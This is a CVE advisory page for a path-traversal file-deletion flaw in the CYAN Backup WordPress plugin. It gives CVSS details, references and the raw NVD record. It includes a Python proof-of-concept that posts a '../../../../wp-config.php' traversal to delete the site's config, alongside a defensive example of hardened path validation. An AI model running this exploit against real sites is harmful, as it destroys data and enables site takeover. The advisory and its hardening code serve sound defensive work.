Security Vulnerability Report
CVE-2025-12092 CVSS 6.5 MEDIUM

CVE-2025-12092

Published: 2025-11-08 10:15:41
Last Modified: 2026-04-15 00:35:42

Description

The CYAN Backup plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' functionality in all versions up to, and including, 2.5.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

The weakness is classified as CWE-22 (path traversal): the file name submitted to the delete action is used without confirming that it resolves inside the plugin's backup directory. Because an Administrator session is required, the CVSS vector scores Privileges Required as High; the practical risk is that a compromised or malicious admin account becomes code execution on the host, since removing wp-config.php returns the site to the WordPress installer. The issue is fixed in version 2.5.5 (see the commit and the changeset to includes/page-backups.php under References).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Vector decoded
Attack Vector: Network; Attack Complexity: Low; Privileges Required: High (Administrator); User Interaction: None; Scope: Unchanged; Confidentiality: None; Integrity: High; Availability: High (exploitability subscore 1.2, impact subscore 5.2, per the NVD record below)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Per the description, the affected product is:

CYAN Backup plugin for WordPress <= 2.5.4 (fixed in 2.5.5, per the referenced changeset)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import sys

import requests

# CVE-2025-12092 PoC - CYAN Backup Arbitrary File Deletion
# Target: WordPress site with CYAN Backup plugin <= 2.5.4
# Authentication: Administrator privileges required (PR:H in the CVSS vector)
#
# NOTE: the admin page slug, the "action"/"file" parameter names and the
# traversal depth used below are assumptions of this PoC; the advisory does
# not document them. Confirm them against the plugin's
# includes/page-backups.php (the file patched in 2.5.5, see References) or by
# intercepting a legitimate backup deletion from the plugin's admin screen.

target_url = "http://target-wordpress-site.com"
username = "admin"
password = "password"

session = requests.Session()

# Step 1: Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": f"{target_url}/wp-admin/",
    "testcookie": "1",
}
session.post(login_url, data=login_data)
# A successful login sets a wordpress_logged_in_* cookie; stop if it is missing.
if not any(name.startswith("wordpress_logged_in_") for name in session.cookies.keys()):
    sys.exit("[-] Login failed - no wordpress_logged_in cookie received")

# Step 2: Access CYAN Backup plugin page
backup_page_url = f"{target_url}/wp-admin/admin.php?page=cyan-backup"
response = session.get(backup_page_url)

# Step 3: Extract nonce for backup deletion
# In a real attack the attacker would intercept a legitimate delete request
# and modify the file path; here the nonce is scraped from the page instead.
nonce_pattern = r'name="_wpnonce" value="([a-z0-9]+)"'
nonce_match = re.search(nonce_pattern, response.text)
if nonce_match is None:
    sys.exit("[-] No _wpnonce found on the plugin page - wrong page slug or plugin not installed")
nonce = nonce_match.group(1)

# Step 4: Delete arbitrary file (e.g., wp-config.php)
# Using path traversal to target wp-config.php; the number of "../" segments
# depends on where the plugin stores backups relative to the WordPress root.
delete_url = f"{target_url}/wp-admin/admin.php?page=cyan-backup"
target_file = "../../../../wp-config.php"  # Path traversal attack
delete_data = {
    "_wpnonce": nonce,
    "action": "delete",
    "file": target_file,
    "_wp_http_referer": backup_page_url,
}

# Send malicious deletion request
result = session.post(delete_url, data=delete_data)

# WordPress admin pages answer 200 even when the action did nothing, so the
# status code alone is weak evidence. The reliable confirmation is that the
# site now serves the installer (wp-admin/install.php) once wp-config.php is gone.
if "deleted" in result.text.lower() or result.status_code == 200:
    print("[+] Delete request accepted - verify that wp-config.php is actually gone")
    print("[+] If it is, the attacker can now reinstall WordPress and gain full control")
else:
    print("[-] Exploitation failed - file may not exist or access denied")
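The defect the advisory describes is a missing containment check on the file name handed to the delete action. The following is an added example, written for this page and not taken from the CYAN Backup plugin or its 2.5.5 fix: it places a deliberately naive deleter next to a hardened one and runs the PoC's traversal payload through both inside a throwaway directory layout. The directory names (wp-content/backups), the file names and the payload depth are constructed for the demonstration.

```python
import os
import tempfile


class UnsafePathError(ValueError):
    """Raised when a requested file name would escape the backup directory."""


def validate_backup_name(backup_dir: str, requested: str) -> str:
    """Return the canonical path of `requested` inside `backup_dir`, or raise.

    Two independent checks, so a bypass of one is still caught by the other:
      1. the value must be a bare file name (no separators, no '.' / '..');
      2. the resolved path must still sit under the resolved backup directory.
    """
    if (requested in ("", ".", "..")
            or "/" in requested or "\\" in requested or "\0" in requested
            or os.path.basename(requested) != requested):
        raise UnsafePathError(f"refusing non-basename file name: {requested!r}")
    root = os.path.realpath(backup_dir)
    target = os.path.realpath(os.path.join(root, requested))
    # realpath() has already collapsed '..' and followed symlinks, so this
    # containment test is on the path the OS would actually touch.
    if os.path.commonpath([root, target]) != root:
        raise UnsafePathError(f"path escapes backup directory: {target}")
    return target


def is_safe_backup_name(backup_dir: str, requested: str) -> bool:
    """Boolean wrapper around validate_backup_name, useful for filters and tests."""
    try:
        validate_backup_name(backup_dir, requested)
        return True
    except UnsafePathError:
        return False


def vulnerable_delete(backup_dir: str, requested: str) -> str:
    """The flaw class the advisory describes (CWE-22): the user-supplied value is
    joined to the backup directory with no validation, so '../' segments walk
    out of it. Illustrative only; this is not the plugin's code."""
    path = os.path.join(backup_dir, requested)
    os.remove(path)
    return path


def safe_delete(backup_dir: str, requested: str) -> str:
    """Hardened deleter: validate first, then remove only a regular file."""
    target = validate_backup_name(backup_dir, requested)
    unresolved = os.path.join(os.path.realpath(backup_dir), requested)
    # Refuse symlinks (even ones pointing inside the directory) and anything
    # that is not a plain file, e.g. a directory or a device node.
    if os.path.islink(unresolved) or not os.path.isfile(target):
        raise UnsafePathError(f"not a regular file in the backup directory: {target}")
    os.remove(target)
    return target


def demo() -> dict:
    """Build a throwaway site layout in a temp dir (constructed sample files, not
    a real WordPress install) and run the traversal payload through both
    deleters. Returns a dict of observations."""
    with tempfile.TemporaryDirectory() as site:
        backup_dir = os.path.join(site, "wp-content", "backups")
        os.makedirs(backup_dir)
        config = os.path.join(site, "wp-config.php")
        legit = os.path.join(backup_dir, "backup-2025-11-08.zip")
        with open(config, "w") as fh:
            fh.write("<?php /* constructed sample, no real secrets */\n")
        with open(legit, "wb") as fh:
            fh.write(b"PK\x03\x04")
        # Same idea as the PoC's payload; depth matches this layout
        # (backups -> wp-content -> site root).
        payload = "../../wp-config.php"

        observed = {}
        vulnerable_delete(backup_dir, payload)
        observed["vulnerable_removed_config"] = not os.path.exists(config)

        with open(config, "w") as fh:  # restore it for the second run
            fh.write("<?php /* constructed sample, no real secrets */\n")
        try:
            safe_delete(backup_dir, payload)
            observed["safe_blocked_traversal"] = False
        except UnsafePathError:
            observed["safe_blocked_traversal"] = True
        observed["config_survives"] = os.path.exists(config)

        safe_delete(backup_dir, "backup-2025-11-08.zip")
        observed["safe_removed_legit"] = not os.path.exists(legit)
        return observed


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The basename check alone would already stop the PoC's payload; the realpath containment check is kept as a second layer because it also catches a symlink planted in the backup directory that points at wp-config.php, and the regular-file check stops the same code path from removing directories. When reviewing a fix like the one in 2.5.5, look for all three properties rather than only a `str_replace('../', ...)` style filter, which is bypassable.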

References

https://github.com/toolstack/cyan-backup/commit/4a79d23e8ba330b5cb655a083c6a00ef32a7b249 (fix commit)
https://plugins.trac.wordpress.org/changeset/3390065/cyan-backup/tags/2.5.5/includes/page-backups.php (2.5.5 changeset to page-backups.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/39972b06-920f-48b0-aa36-bb5caab87cb6?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12092",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-11-08T10:15:41.143",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The CYAN Backup plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' functionality in all versions up to, and including, 2.5.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/toolstack/cyan-backup/commit/4a79d23e8ba330b5cb655a083c6a00ef32a7b249", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3390065/cyan-backup/tags/2.5.5/includes/page-backups.php", "source": "security@wordfence.com"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/39972b06-920f-48b0-aa36-bb5caab87cb6?source=cve", "source": "security@wordfence.com"}
    ]
  }
}